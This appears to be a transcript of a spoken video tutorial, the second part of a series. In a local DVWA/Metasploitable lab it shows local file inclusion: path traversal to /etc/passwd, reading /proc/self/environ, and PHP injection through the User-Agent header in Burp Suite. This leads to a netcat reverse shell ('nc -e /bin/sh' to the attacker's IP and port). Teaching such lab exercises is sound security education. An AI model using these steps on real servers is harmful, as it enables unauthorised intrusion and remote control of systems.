Hello everyone. So today I will let you know about the file inclusion vulnerability. So also we call that LFI. So I will do some practical, to understand how we can hack a website or how we can hack a server, right? So it will be the fully practical, and this is the part 2 video. I have already covered one video that is in part 2. So let's start. So guys, as you know, always I'm using two machine here. If I This is the IP of my Metasploit machine. If I showcase you, this is the Kali Linux and this is the Metasploit. So this is the IP of Metasploit machine because I have created the environment on local, and these are the website which where I can testing. So I will today test on DVWA, and on this DVWA I will test on file inclusion. So here we will test. So these all I have covered in my first part 1 video, so you can also visit that. So guys, here I am able to access the page include.php through, like, there are mm, some directory dvwa vulnerability f5. Then in f5 we are making a query page is equal to include.php. So before doing first thing, I will let you know some of like command. So for example, in my Kali Linux, I am opening a file cat etc and password PAWSW. If I enter, guys, this is the password file and this is the inbuilt file. That means any system which are based on Linux, those system by default have this files. That means this is the server we know, and this server also have this file where in a root directory, then etc, and within etc we have this file. But here we are not in root directory, we are in dvwa vulnerability f5, then this directory. How we go to the root directory here? So if you remove this here and enter here, so you will get these the full root directory. If I copy this here, copy, and now if I go back, so here this is the query, um, page is equal to include.php, but we will not able we are not finding include, we will find the password file first. If I paste here, and how we can go back, we use dot dot to go back. So I will go back 5 times, right? Because we are the in folder f5 in fifth layer. So now if I put the etc, because now we are able to like get on root etc and then PAWSWD password. So you can see here I am able to read the file. So guys, this thing I have already covered in my part 1 video with the detail. So you can go to the my part 1 video, then come to the part 2 video, right? So these all are the about the part video 1. So now I will let you know how we can inject our code. So guys, we know, like, we are able to read any file. As you see, we are able to read any file. Now what we will do, like, we write some malicious code and try to inject this readable file. How we can inject, I will let you know, or how we can write malicious code, I will let you know. So same as we can access also the second file, right? Second file is that we are trying to cat proc and in self, and the file in invo, INVIRON. If you see here, guys, this is the related to environment file in my Kali Linux. That means this file same also should be on the server, because server also based on Linux, right? So if I copy this, right, copy, and if I paste here, control V, so if I enter here, so you can see here I'm able to access this file. Why I am accessing this file, I will let you know, because now in this file I will inject my code. How I can I inject? So here you can see there is a important information. If you see here, http user agent is equal to Mozilla. You, if you are able to see here, and Firefox. So that means these code, Mozilla, I'm using Linux or whatever, Firefox, these are the client side, and we can capture the client side request. And if we are able to capture the client side request, then in client side we can inject our code. So how we can inject? So we will use for this Burp Suite. Burp Suite is the tool. I have already covered this Burp Suite, how we can use or why we can use, right? So generally, here if I make this shorter, so I will create a request from here. Request will capture by this tool here, and in this Burp Suite, I will modify that request and will try to inject my code on that request, right? When that request give the response, so on that time this server will be hacked. So I'm here proxy intercept, I will on this to capture the request. If I refresh this, guys, request is now I have able to capture. So there is a one, a parameter. If you go to the request header here and see, there is a parameter user agent. So this is the parameter. So now if you modify that parameter value here, if you remove, and what you modify, I have already, I think, yeah, this one, copy, right? And I am pasting here. If you modified value, so this is the PHP page, and right. So uh okay, I think something wrong. Okay, if I apply the changes here, apply changes and try to forward that request, I have forward request, and this page is reflected. That means we can inject our code, malicious code, into the request. We clear that. Now we will make the malicious code. So I am offing this. So I will use here reverse shell, right? So how we can use? So again I am, so in Linux, first in Linux we already know, I have already covered it's many time. I am now, I will try to listen connection on my port. So this is the command, copy. In Linux you can paste here, and if I enter, so you are able to see I am listening here port 8888. That means anyone try to connect with the 888 from somewhere, so I will able to access that system. So right, my Linux machine is listening here. If I go to the website and refresh here, so okay, I have to first intercept is on. So if I refresh this, so guys, I am able to capture the request. Same as I will modify it here. What I modified here. So this is the command. I will let you know. This is the pass through, and this is the command, and this is IP of my Kali Linux, right? This is the IP of my Kali Linux, and this is the port where we are listening, right? So you can copy this command and you can paste here. First, you have to type this type of PHP, right? So what I have done, I have used pass through the method nc hyphen e bin sh 192.168.175.128. This is my Kali Linux IP. You can type your Kali Linux IP, and this is the port where we are try to listening. If I apply this, I have applied the change and go to the forward button. So now if you here, guys, we are now able to connect. You can see here, this is my Kali Linux IP. This IP is connecting from this IP. This is the server IP. That means I am able to hack this website from the reverse side. If I use the sum of command, ls to know about the list of directory. So you can here there are 4 page or directory which we can read. If I use cd minus dot dot and try to ls, so you will see here there are multiple files which I am able to see. So guys, that means what I have done, I will like summarize you. First, this is the information gathering part where we know this website is on Linux, and in on Linux we know there is a environment file which we can read. So same is, we first try to visit this environment file and try to read here, and here we found there is a Mozilla or Firefox keyword which are, that means these are coming from the client side, right? So that's why I use Burp Suite. Burp Suite will cap like use for the capture request which are coming from the client side. So when I refresh this page, the request will go to the Burp Suite, and Burp Suite capture that request. If you see here, okay, Burp Suite capture that request. In that Burp Suite, I modified or I like inject my code onto the onto the like that parameter which we capture agent, or like Mozilla agent type of capture parameter. So I have like inject our code into that. When I forward that request, so on that time request will go to the server, right? Server means on this IP. So our code, when it will process, our code will execute and we are able to hack that server or this website. So now this is the lecture on to the LFI, how we can hack a website through the LFI or the reverse shell. So this is all in this video. First, I think to better understand, you have to visit my first video or first part one video. On that part one, I have explained how we do that all these things, right? So this is all here, friends, and please subscribe my channel to to know about the upcoming video on hacking tutorial. So thank you everyone. This is all. Thank